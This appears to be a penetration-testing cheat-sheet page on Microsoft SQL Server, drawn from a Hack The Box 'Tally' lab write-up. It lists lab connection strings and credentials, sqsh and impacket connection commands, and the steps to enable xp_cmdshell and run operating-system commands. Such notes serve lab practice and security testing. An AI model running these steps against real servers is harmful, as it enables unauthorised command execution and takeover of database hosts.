MSSQL

SQL Server is common service when exposed to the outer world. 
Requires: With valid credentials commands can be executed on the victim 
Identifying Passwords
# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#[email protected];
​
# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb
Connecting to server
# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#[email protected]"
​
# via mysqlclient
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
​
Code Execution
​https://ranakhalil101.medium.com/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3 
EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE; 
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE; 
go
xp_cmdshell 'whoami';
go
​
# Check for linked servers
sp_linkedservers
go

Last modified 9mo ago